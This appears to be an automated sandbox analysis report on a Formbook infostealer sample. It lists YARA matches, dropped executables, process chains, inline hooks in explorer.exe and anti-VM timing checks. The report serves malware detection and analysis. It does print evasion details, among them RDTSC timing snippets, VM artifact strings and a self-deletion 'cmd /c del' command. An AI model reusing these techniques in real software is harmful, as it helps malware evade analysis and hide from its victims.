            Source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPEDMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPEDMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: New_1007572_021.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: New_1007572_021.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: FB_5E87.tmp.exe.8.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: FB_5E87.tmp.exe.8.drStatic PE information: Section .text
            Source: classification engineClassification label: mal100.troj.evad.winEXE@11/5@1/2
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeCode function: 8_2_00401000 FindResourceA,SizeofResource,LoadResource,LockResource,GetTempPathA,GetTempFileNameA,MoveFileExA,MoveFileExA,sprintf,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,FreeResource,MoveFileExA,ExitProcess,8_2_00401000
            Source: C:\Users\user\Desktop\New_1007572_021.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New_1007572_021.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6756:120:WilError_01
            Source: C:\Users\user\Desktop\New_1007572_021.exeFile created: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeJump to behavior
            Source: New_1007572_021.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\New_1007572_021.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: New_1007572_021.exeReversingLabs: Detection: 28%
            Source: C:\Users\user\Desktop\New_1007572_021.exeFile read: C:\Users\user\Desktop\New_1007572_021.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\New_1007572_021.exe 'C:\Users\user\Desktop\New_1007572_021.exe'
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess created: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe'
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess created: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe C:\Users\user\AppData\Local\Temp\New_1007572_021.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe' Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe' Jump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\New_1007572_021.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: New_1007572_021.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: New_1007572_021.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: FB_5E87.tmp.exe, 0000000A.00000002.823189585.00000000032C0000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.765998733.0000000005A00000.00000002.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: FB_5E87.tmp.exe, 0000000A.00000002.822175695.00000000013F0000.00000040.00000001.sdmp, cscript.exe, 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: FB_5E87.tmp.exe, 0000000A.00000002.822175695.00000000013F0000.00000040.00000001.sdmp, cscript.exe
            Source: Binary string: cscript.pdb source: FB_5E87.tmp.exe, 0000000A.00000002.823189585.00000000032C0000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.765998733.0000000005A00000.00000002.00000001.sdmp

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: New_1007572_021.exe, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs.Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: New_1007572_021.exe.0.dr, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs.Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.2.New_1007572_021.exe.800000.0.unpack, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs.Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.0.New_1007572_021.exe.800000.0.unpack, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs.Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 8.0.New_1007572_021.exe.b50000.0.unpack, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs.Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 8.2.New_1007572_021.exe.b50000.1.unpack, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs.Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: New_1007572_021.exeStatic PE information: 0xDF29736D [Sun Aug 22 17:54:53 2088 UTC]
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109D12C push eax; ret 10_2_0109D132
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01097140 push edi; retf 10_2_01097160
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109D166 push dword ptr [CCC28DB9h]; ret 10_2_0109D772
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01097814 push eax; retf 10_2_0109781A
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109784D push eax; retf 10_2_0109781A
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109D075 push eax; ret 10_2_0109D0C8
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109D0CB push eax; ret 10_2_0109D132
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109D0C2 push eax; ret 10_2_0109D0C8
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0108EDBC push edx; retf 10_2_0108EDBF
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109C443 push eax; iretd 10_2_0109C44B
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109E4EE push ds; iretd 10_2_0109E4EF
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109D773 push dword ptr [CCC28DB9h]; ret 10_2_0109D772
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048ED0D1 push ecx; ret 19_2_048ED0E4
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CD12C push eax; ret 19_2_031CD132
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031C7140 push edi; retf 19_2_031C7160
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CD166 push dword ptr [CCC28DB9h]; ret 19_2_031CD772
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031C7814 push eax; retf 19_2_031C781A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031C784D push eax; retf 19_2_031C781A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CD075 push eax; ret 19_2_031CD0C8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CD0CB push eax; ret 19_2_031CD132
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CD0C2 push eax; ret 19_2_031CD0C8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CD773 push dword ptr [CCC28DB9h]; ret 19_2_031CD772
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031BEDBC push edx; retf 19_2_031BEDBF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CC443 push eax; iretd 19_2_031CC44B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CE4EE push ds; iretd 19_2_031CE4EF
            Source: initial sampleStatic PE information: section name: .text entropy: 7.98710710749
            Source: initial sampleStatic PE information: section name: .text entropy: 7.98710710749
            Source: initial sampleStatic PE information: section name: .text entropy: 7.40373413401
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeFile created: C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exeJump to dropped file
            Source: C:\Users\user\Desktop\New_1007572_021.exeFile created: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeFile created: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xEF
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeRDTSC instruction interceptor: First address: 00000000010898E4 second address: 00000000010898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeRDTSC instruction interceptor: First address: 0000000001089B4E second address: 0000000001089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 00000000031B98E4 second address: 00000000031B98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 00000000031B9B4E second address: 00000000031B9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01089A80 rdtsc 10_2_01089A80
            Source: C:\Users\user\Desktop\New_1007572_021.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exe TID: 6716Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\New_1007572_021.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: explorer.exe, 0000000B.00000000.798630799.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: explorer.exe, 0000000B.00000000.771534648.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000B.00000000.767000909.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000B.00000000.771534648.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000B.00000000.771670358.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
            Source: explorer.exe, 0000000B.00000000.760088803.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 0000000B.00000000.798630799.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 0000000B.00000000.771670358.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: explorer.exe, 0000000B.00000000.798630799.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: explorer.exe, 0000000B.00000000.771670358.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
            Source: explorer.exe, 0000000B.00000000.798630799.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01089A80 rdtsc 10_2_01089A80
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0108ACC0 LdrLoadDll,10_2_0108ACC0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A849B mov eax, dword ptr fs:[00000030h]19_2_048A849B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04968CD6 mov eax, dword ptr fs:[00000030h]19_2_04968CD6
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916CF0 mov eax, dword ptr fs:[00000030h]19_2_04916CF0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916CF0 mov eax, dword ptr fs:[00000030h]19_2_04916CF0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916CF0 mov eax, dword ptr fs:[00000030h]19_2_04916CF0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049514FB mov eax, dword ptr fs:[00000030h]19_2_049514FB
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]19_2_04951C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]19_2_04951C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]19_2_04951C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]19_2_04951C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]19_2_04951C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]19_2_04951C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]19_2_04951C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]19_2_04951C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]19_2_04951C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]19_2_04951C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]19_2_04951C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]19_2_04951C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]19_2_04951C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]19_2_04951C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0496740D mov eax, dword ptr fs:[00000030h]19_2_0496740D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0496740D mov eax, dword ptr fs:[00000030h]19_2_0496740D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0496740D mov eax, dword ptr fs:[00000030h]19_2_0496740D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916C0A mov eax, dword ptr fs:[00000030h]19_2_04916C0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916C0A mov eax, dword ptr fs:[00000030h]19_2_04916C0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916C0A mov eax, dword ptr fs:[00000030h]19_2_04916C0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916C0A mov eax, dword ptr fs:[00000030h]19_2_04916C0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CBC2C mov eax, dword ptr fs:[00000030h]19_2_048CBC2C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492C450 mov eax, dword ptr fs:[00000030h]19_2_0492C450
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492C450 mov eax, dword ptr fs:[00000030h]19_2_0492C450
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CA44B mov eax, dword ptr fs:[00000030h]19_2_048CA44B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B746D mov eax, dword ptr fs:[00000030h]19_2_048B746D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04892D8A mov eax, dword ptr fs:[00000030h]19_2_04892D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04892D8A mov eax, dword ptr fs:[00000030h]19_2_04892D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04892D8A mov eax, dword ptr fs:[00000030h]19_2_04892D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04892D8A mov eax, dword ptr fs:[00000030h]19_2_04892D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04892D8A mov eax, dword ptr fs:[00000030h]19_2_04892D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2581 mov eax, dword ptr fs:[00000030h]19_2_048C2581
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2581 mov eax, dword ptr fs:[00000030h]19_2_048C2581
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2581 mov eax, dword ptr fs:[00000030h]19_2_048C2581
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2581 mov eax, dword ptr fs:[00000030h]19_2_048C2581
